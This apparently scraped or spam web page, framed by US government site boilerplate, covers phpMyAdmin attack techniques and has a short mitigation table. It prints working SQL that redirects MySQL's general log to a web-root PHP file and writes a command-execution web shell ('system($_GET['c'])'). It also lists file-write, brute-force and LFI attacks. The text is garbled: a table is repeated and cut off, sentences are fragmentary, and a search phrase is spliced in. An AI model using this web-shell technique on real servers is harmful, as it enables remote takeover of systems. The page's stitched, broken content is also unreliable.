Skip to main content

An official website of the United States government

Here’s how you know

Phpmyadmin - Hacktricks Verified

| Attack | Mitigation | |--------|-------------| | File write RCE | Set secure_file_priv = "/tmp/" or empty string? Better to set a safe directory or NULL. | | General log injection | Monitor general_log variable changes; set read-only for web user. | | Brute force | Use $cfg['LoginCookieValidity'] = 900 + fail2ban on /phpmyadmin. | | LFI (old versions) | Upgrade to 5.2.1+; remove /doc/ and /changelog.php from production. |

Requires FILE privilege and appropriate OS permissions (e.g., MySQL running as root, or weak directory permissions).

If secure_file_priv is set but you can change global variables: phpmyadmin hacktricks verified

SET GLOBAL general_log = 'ON';
SET GLOBAL general_log_file = '/var/www/html/shell.php';
SELECT "<?php system($_GET['c']); ?>";

Verification: Requires SUPER or ADMIN privilege. Works on MySQL 5.x/8.x if log dir is writable by mysql user.

Target: phpMyAdmin (typically http://target/phpmyadmin, http://target/phpmyadmin/, or /pma) Prerequisite: Network access to the phpMyAdmin interface or leaked credentials. | Attack | Mitigation | |--------|-------------| | File

This guide covers verified techniques to leverage phpMyAdmin for remote code execution (RCE), file read/write, and privilege escalation.

Once logged in, the game is over for the server. Verification: Requires SUPER or ADMIN privilege

Sometimes an attacker only gets low-priv database access but no file write. Still dangerous.

GSA.gov

An official website of the U.S. General Services Administration

Looking for U.S. government information and services?
Visit USA.gov